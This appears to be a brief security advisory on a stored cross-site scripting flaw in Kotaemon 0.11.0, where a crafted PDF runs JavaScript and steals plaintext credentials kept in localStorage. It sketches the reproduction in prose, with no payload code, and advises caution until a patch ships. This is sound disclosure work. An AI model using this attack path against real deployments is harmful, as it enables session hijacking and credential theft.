Kotaemon Cross-Site Scripting Vulnerability Allowing Arbitrary Code Execution via Crafted PDF

A stored cross-site scripting vulnerability has been identified in Kotaemon version 0.11.0. This issue allows attackers to execute arbitrary JavaScript by uploading a malicious PDF, which is rendered without proper sanitization. The vulnerability is compounded by the application's practice of storing plaintext credentials in localStorage, leading to a complete session compromise.

Impact

Exploitation of this vulnerability allows for the execution of arbitrary JavaScript in the context of the user, enabling credential theft and session hijacking. Additionally, it causes a loss of trust in the application's document processing and AI output integrity.

Reproduction

To reproduce this vulnerability, upload a PDF containing a crafted image or table that exploits the unsanitized rendering process. Once the PDF is uploaded, the embedded JavaScript will execute, accessing and exfiltrating stored credentials from localStorage.

Remediation

Users are advised to monitor for updates from the Kotaemon development team and avoid uploading untrusted documents until a patch is available.